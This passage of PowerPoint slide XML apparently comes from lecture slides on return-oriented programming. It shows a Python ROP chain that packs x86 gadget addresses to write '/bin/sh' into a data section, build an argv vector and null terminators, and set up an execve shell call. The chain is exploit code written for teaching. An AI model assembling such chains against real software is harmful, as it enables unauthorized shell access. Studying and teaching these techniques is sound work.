              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> to @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 4</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0x0806e91a) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</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0x080ea064) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 4</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0x080bb6d6) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</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0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 8</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0x0806e91a) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</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0x080ea068) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 8</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0x80541b0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>183</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="852474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8155"/>
            <a:ext cx="8229600" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now the null-terminated string /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> will be at 0x080ea060, which is first argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Next build up the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> vector for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, need to have @.data followed by zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Let's use @.data + 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0806e91a) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx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0x080ea06c) # @.data +12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080bb6d6) # pop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0x080ea060) # @.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now to add NULL to @.data + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0806e91a) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx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0x080ea070) # @.data + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80541b0)  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</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0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</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a:t>
            </a:r>
            <a:r>
